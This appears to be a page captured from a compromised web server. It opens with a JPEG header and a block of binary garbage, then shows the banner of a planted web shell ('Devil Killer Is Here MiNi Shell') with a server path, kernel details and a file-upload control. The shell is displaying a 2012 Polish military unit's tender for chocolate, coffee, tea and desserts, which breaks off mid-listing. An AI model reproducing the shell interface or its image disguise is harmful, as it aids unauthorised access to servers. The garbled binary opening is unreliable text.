JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120828/318826-N-2012.html

<p class="kh_header"><b>Kraków: Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów.</b><br>
<b>Numer ogłoszenia: 318826 - 2012; data zamieszczenia: 28.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4228 , ul. Montelupich 3, 30-901 Kraków, woj. małopolskie, tel. 12 455 75 53, faks 12 455 75 53.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.3rblog.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów (tj. czekolada pełna gorzka, czekolada pełna mleczna, czekolada mleczna z orzechami, czekolada z nadzieniem owocowym, wafel czekoladowy, baton czekoladowy, cukierki czekoladowe, cukierki witaminizowane, baton musli o smaku owocowym w polewie czekoladowej, krakersy, paluszki, kakao, kawa naturalna mielona, kawa rozpuszczalna, herbata czarna liściasta, herbata czarna granulowana, herbata w torebkach - ekspresowa, herbata witaminizowana, budyń, galaretka, kisiel) do jednostek wojskowych (miejsc dostawy) rejonu zaopatrywania JW 4228 Kraków w 2013 roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.10.00-5, 15.86.41.00-3, 15.86.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca przystępujący do przetargu obowiązany jest wnieść wadium przed  upływem terminu składania ofert tj. do dnia 10.09.2012 r. do godz. 10.00 w wysokości: 
dla zadania nr 1 -  1 150,00 zł
dla zadania nr 2 -      70,00 zł
dla zadania nr 3 -    760,00 zł 
dla zadania nr 4 -    900,00 zł
dla zadania nr 5 -    650,00 zł 
dla zadania nr 6 -    560,00 zł 
dla zadania nr 7 -    550,00 zł 
W przypadku składania ofert na więcej niż jedno zadanie kwota wadium nie może być mniejsza niż suma kwot odpowiadających poszczególnym zadaniom, w zakresie których realizację zamówienia wykonawca oferuje (np. jeżeli wykonawca zaoferuje realizacje zamówienia w zakresie zadania nr 1, 2 oraz 3 wówczas musi wnieść wadium na kwotę nie mniejszą niż 1 980,00 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie oświadczenia wykonawcy zgodnego z art. 22 ust. 1 ustawy Pzp. Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie 1. oświadczenia wykonawcy zgodnego z art. 22 ust. 1 ustawy Pzp, 2. wykazu dostaw odpowiadających swoim rodzajem przedmiotowi zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzającego, że wykonawca zrealizował w tym okresie dostawy odpowiadające swoim rodzajem przedmiotowi zamówienia, o wartości nie mniejszej niż: 
 dla zadania nr 1 -70 000,00 zł , dla zadania nr 2 - 16 000,00 zł, dla zadania nr 3 -     46 000,00 zł, dla zadania nr 4 - 54 000,00 zł, dla zadania nr 5 - 8 000,00 zł, dla zadania nr 6 -  34 000,00 zł, dla zadania nr 7 -  33 000,00 zł. 
W przypadku składania ofert na więcej niż jedno zadanie wartość zrealizowanych dostaw nie może być mniejsza niż suma kwot odpowiadających poszczególnym zadaniom, w zakresie których realizację zamówienia wykonawca oferuje (np. jeżeli wykonawca zaoferuje realizacje zamówienia w zakresie zadania nr 1, 2 oraz 3 wówczas musi wykazać należyte wykonanie lub wykonywanie dostaw odpowiadających swoim rodzajem przedmiotowi zamówienia o wartości nie mniejszej niż 132 000,00 złotych); 3. dokumentów potwierdzających, że dostawy wymienione w wykazie zostały wykonane należycie. Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie oświadczenia wykonawcy zgodnego z art. 22 ust. 1 ustawy Pzp. Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie oświadczenia wykonawcy zgodnego z art. 22 ust. 1 ustawy Pzp. Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku będzie dokonywana na podstawie 1. oświadczenia wykonawcy zgodnego z art. 22 ust. 1 ustawy Pzp, 2. informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w której wykonawca posiada rachunek potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy nie mniejszą niż dla zadania nr 1 -70 000,00 zł ,  dla zadania nr 2 - 16 000,00 zł, dla zadania nr 3 - 46 000,00 zł, dla zadania nr 4 - 54 000,00 zł,  dla zadania nr 5 - 8 000,00 zł , dla zadania nr 6 - 34 000,00 zł, dla zadania nr 7 -     33 000,00 zł.
W przypadku składania ofert na więcej niż jedno zadanie kwota posiadanych środków  finansowych lub zdolność kredytowa wykonawcy nie może być mniejsza niż suma kwot odpowiadających poszczególnym zadaniom, w zakresie których realizację zamówienia wykonawca oferuje (np. jeżeli wykonawca zaoferuje realizacje zamówienia w zakresie zadania nr 1, 2 oraz 3 wówczas musi wykazać posiadanie środków finansowych lub zdolności kredytowej w wysokości nie mniejszej niż 132 000,00 złotych).Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.












Ocena dokonana zostanie zgodnie z formułą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy spełniają wymagania określone przez zamawiającego, wykonawca jest zobowiązany załączyć do oferty:
1) decyzję Państwowego Inspektora Sanitarnego o zatwierdzeniu zakładu, do wprowadzenia do obrotu produktów pochodzenia niezwierzęcego lub zaświadczenie wydane w 2012r. przez Państwową Inspekcję Sanitarną potwierdzające wpis do rejestru zatwierdzonych zakładów produkujących lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (wzór zawiera załącznik nr 6 do rozporządzenia Ministra zdrowia z dnia 29 maja 2007r. w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzania zakładów produkcyjnych lub wprowadzających do obrotu żywność, podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej)
2) aktualny dokument potwierdzający stosowanie wdrożonego systemu HACCP, tj.:
a) certyfikat HACCP, wystawiony przez niezależną, akredytowaną jednostkę certyfikującą, lub 
b) zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP, wydane na podstawie art. 59 i 73 ust.1 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia, lub 
c) protokół z kontroli sanitarnej przeprowadzonej przez organy Państwowej Inspekcji sanitarnej, jako organ urzędowej kontroli żywności, w skład którego wchodzi punkt zawierający pozytywną ocenę opracowania, wdrożenia i utrzymania systemu HACCP na podstawie art. 59 i 73 ust. 1 ustawy z dnia 26 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony druk OFERTA, 2. wypełniony formularz cenowy w zakresie zadań, których realizację wykonawca oferuje; 3.	Oryginał lub kopię pełnomocnictwa:
a) dla osoby/osób podpisującej/cych ofertę - do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. z aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, odpisu z właściwego rejestru). 
b) dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu  albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.
Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie.
4. W przypadku, gdy wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zobowiązanie należy złożyć w formie oryginału.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość wprowadzenia do umowy zmian. 
Warunki zmiany umowy: 
1) Na pisemny wniosek Zamawiającego dopuszcza się zmiany w ilościach poszczególnych towarów (środków spożywczych) określonych w ilościach zawartych w umowie przy zachowaniu następujących warunków:
a) zmiana wynika z potrzeb odbiorców, których nie można było przewidzieć w chwili zawarcia umowy;
b) zmiana nie powoduje przekroczenia maksymalnej wartości umowy brutto. 
2) W przypadku zmiany wysokości stawki podatku od towarów i usług (VAT), na pisemny wniosek zainteresowanej strony, dopuszcza się zmianę wartości umowy brutto w stosunku do towarów, których zmiana dotyczy.
3) Dopuszcza się waloryzację cen jednostkowych netto według wskaźnika cen towarów i usług konsumpcyjnych dla żywności i napojów bezalkoholowych opublikowanego przez Główny Urząd Statystyczny w Biuletynie Statystycznym GUS .Celem waloryzacji jest tylko i wyłącznie urealnienie cen zakupu przedmiotu niniejszej umowy.
4) Waloryzacja jest dopuszczalna w razie łącznego spełnienia następujących warunków:
1) złożenia pisemnego wniosku przez zainteresowaną stronę, przy czym każda ze stron ma prawo do  dwukrotnej waloryzacji na swoją korzyść;
2) upływu pięciu miesięcy od rozpoczęcia realizacji umowy,
3) zmiany wskaźnika przekraczającej 5 punktów procentowych, 
5) Waloryzację przeprowadza się w oparciu o otrzymane w formie pisemnej z GUS wskaźniki cen towarów i usług konsumpcyjnych - żywność i napoje bezalkoholowe, za miesiąc poprzedzający wpływ wniosku, o którym mowa powyżej, w odniesieniu do cen z grudnia 2012r. , dla odpowiednich grup żywności lub wybranych produktów.
6) Zmiana cen wskutek waloryzacji wymaga formy pisemnej pod rygorem nieważności 
i wywołuje skutek od dnia podpisania stosownego aneksu do umowy, który powinien zostać podpisany w terminie do 30 dni od daty otrzymania przez Zamawiającego stosownej informacji z GUS. W przypadku gdy Wykonawca wraz z wnioskiem do Zamawiającego przedłoży prawidłową informację z GUS, sporządzoną w formie pisemnej, dopuszcza się dokonanie waloryzacji na podstawie takowej informacji.
2.Ostateczna treść umowy może ulec zmianie w zakresie niezmieniającym istotnych 
     postawień oferty i specyfikacji istotnych warunków zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.3rblog.wp.mil.pl, www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4228, ul. Montelupich 3, 30-901 Kraków, bud. 28, pok. 24, godz. 8.00-15.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2012 godzina 10:00, miejsce: Jednostka Wojskowa 4228, ul. Montelupich 3, 30-901 Kraków, bud. 28, - kancelaria jawna..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów do obszaru I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czekolada pełna gorzka	kg		320
Czekolada pełna mleczna	kg	270
Czekolada mleczna z orzechami	kg	320
Czekolada nadzieniem owocowym	kg	220
Wafel czekoladowy	kg	460
Baton czekoladowy	kg	445
Cukierki czekoladowe	kg	40
Cukierki witaminizowane	kg	40
Baton musli o smaku owocowym 	kg	115
Krakersy	kg	30
Paluszki	kg	30
Kakao 	kg	140
Kawa naturalna mielona	kg	125
Kawa rozpuszczalna	kg	60
Herbata czarna liściasta	kg	160
Herbata czarna granulowana	kg 35
Herbata w torebkach (ekspresowa)	kg	64
Herbata witamizowana	kg	210
Budyń	kg			50
Galaretka	kg		260
Kisiel	kg			50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.10.00-5, 15.86.41.00-3, 15.86.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów do obszaru II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czekolada pełna gorzka	kg	50
Czekolada pełna mleczna	kg	150
Czekolada mleczna z orzechami	kg	50
Czekolada nadzieniem owocowym	kg	100
Wafel czekoladowy	kg	100
Baton czekoladowy	kg	150
Krakersy	kg	10
Paluszki	kg	10
Kakao 	kg	30
Kawa naturalna mielona	kg	330
Kawa rozpuszczalna	kg	170
Herbata czarna liściasta	kg	110
Herbata w torebkach (ekspresowa)	kg	54
Budyń	kg	50
Galaretka	kg	250
Kisiel	kg	190.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.10.00-5, 15.86.41.00-3, 15.86.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów do obszaru III..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czekolada pełna gorzka	kg	440
Czekolada pełna mleczna	kg	480
Czekolada mleczna z orzechami	kg	480
Czekolada nadzieniem owocowym	kg	440
Wafel czekoladowy	kg	480
Baton czekoladowy	kg	480
Cukierki czekoladowe	kg	170
Cukierki witaminizowane	kg	150
Baton musli o smaku owocowym 	kg	420
Krakersy	kg	230
Paluszki	kg	250
Kakao 	kg	170
Kawa naturalna mielona	kg	156
Kawa rozpuszczalna	kg	116
Herbata czarna liściasta	kg	115
Herbata czarna granulowana	kg		130
Herbata w torebkach (ekspresowa)	kg	155
Herbata witamizowana	kg	140
Budyń	kg	190
Galaretka	kg	280
Kisiel	kg	240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.21.00-3, 15.84.22.20-0, 15.84.10.00-5, 15.86.41.00-3, 15.86.30.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa czekolad, wyrobów cukierniczych, kawy, kakao, herbaty i deserów do obszaru IV..</p>
